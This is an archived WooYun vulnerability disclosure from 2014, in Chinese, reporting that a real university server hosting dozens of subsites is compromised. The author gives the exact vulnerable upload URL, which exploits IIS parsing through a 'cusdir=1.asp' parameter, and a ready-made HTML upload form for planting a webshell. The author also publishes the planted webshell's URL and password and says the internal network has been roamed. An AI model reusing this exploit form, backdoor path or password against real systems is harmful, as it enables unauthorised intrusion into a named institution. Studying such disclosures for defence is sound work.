安徽师范大学可内网漫游多台服务器沦陷

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-079847

漏洞标题：安徽师范大学可内网漫游多台服务器沦陷

漏洞作者：小骇

提交时间：2014-10-20 11:59

修复时间：2014-10-25 12:00

公开时间：2014-10-25 12:00

漏洞类型：文件上传导致任意代码执行

危害等级：高

自评Rank：20

漏洞状态：已交由第三方合作机构(CCERT教育网应急响应组)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2014-10-20：细节已通知厂商并且等待厂商处理中
2014-10-25：厂商已经主动忽略漏洞，细节向公众公开

简要描述：

安徽师范大学....学校呀，不多说了，看下面吧！

详细说明：

安徽师范大学可内网漫游，多台服务器沦陷。
具体说是一个分站漏洞的服务器沦陷，导致了这个现象。
好吧，漏洞网址在：http://210.45.192.200/这个服务器上面，
这台服务器控制着学校以下网站：

cysj  大学生创业实践中心 001  ok3w
luqu  高考录取查询        
xkcj  艺术校考成绩查询
xklq  艺术校考录取查询  
xsc   皖江学生处         002   ok3w
yswb  艺术校考网报平台
yuwen 大学语文精品课程   003   ok3w
exam  大学语文选择题在线测试  
zuoye 大学语文作业系统
shitiku 大学语文试题库系统
xywh    校园文化资源
sucai   素材资源
zhuanti  专题讲座
anli  教学案例
MP4   视频内容
edu  中小学教育信息化专题
dzgcx 电子工程系网站    aspcms
rsc 人事处              aspcms
xcb 宣传部              otcms
hxgcx 化学工程系        aspcms
ncre37cj   37次成绩考试查询
jpkcdw     网页设计精品课程   aspcms
news   新闻网  php
gbz  广播站   php
jzt  记者团   php
syzx 实验中心 ok3w   004
xljk 心理健康网  xycms
shetuan 社团联合会 xycms
xsh 学生会 xycms
wjgh  工会  phpcms
jpkckj  会计学精品课程  ok3w
card 会员卡收费系统  asp
school 无纸化考试系统 asp
jpkcdz 电子自动化精品课程  aspcms
wjkc 课酬统计系统 php
wjxq 学前教育系   php
vote 在线投票   asp
wjkc2 课酬系统3.0  php
szb  思政部  aspcms

这个漏洞出现在xsh这个站点上面，别的站点也有，是一个上传漏洞并配合IIS的解析漏洞，可拿下shell，
漏洞地址：http://210.45.192.200/xsh/admin/xyeWebEditor/asp/upload.asp?action=save&type=image&style=popup&cusdir=1.asp

是上传的漏洞，就构造表单上传吧
表单如下：

<form action="http://210.45.192.200/xsh/admin/xyeWebEditor/asp/upload.asp?action=save&type=image&style=popup&cusdir=1.asp"method=post name=myform enctype="multipart/form-data"><input type=file name=uploadfile size=100><br><br><input type=submit value=upload></form>

上传一个图片马，直接拿下shell。

漏洞证明：

大马走起，开始内网漫游，http://210.45.192.200/xsh/news.asp 密码：xiaohai

无意之间已有重大发现：请看截图

在网吧，没钱了，先下了。再补充

修复方案：

版权声明：转载请注明来源小骇@乌云

漏洞回应

厂商回应：

危害等级：无影响厂商忽略

忽略时间：2014-10-25 12:00

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-079847

漏洞标题：安徽师范大学可内网漫游多台服务器沦陷

相关厂商：安徽师范大学

漏洞作者：小骇

提交时间：2014-10-20 11:59

修复时间：2014-10-25 12:00

公开时间：2014-10-25 12:00

漏洞类型：文件上传导致任意代码执行

危害等级：高

自评Rank：20

漏洞状态：已交由第三方合作机构(CCERT教育网应急响应组)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源小骇@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-079847

漏洞标题：安徽师范大学可内网漫游多台服务器沦陷

相关厂商：安徽师范大学

漏洞作者： 小骇

提交时间：2014-10-20 11:59

修复时间：2014-10-25 12:00

公开时间：2014-10-25 12:00

漏洞类型：文件上传导致任意代码执行

危害等级：高

自评Rank：20

漏洞状态：已交由第三方合作机构(CCERT教育网应急响应组)处理

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2014-079847"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 小骇@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

漏洞概要关注数(24) 关注此漏洞

漏洞作者：小骇

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源小骇@乌云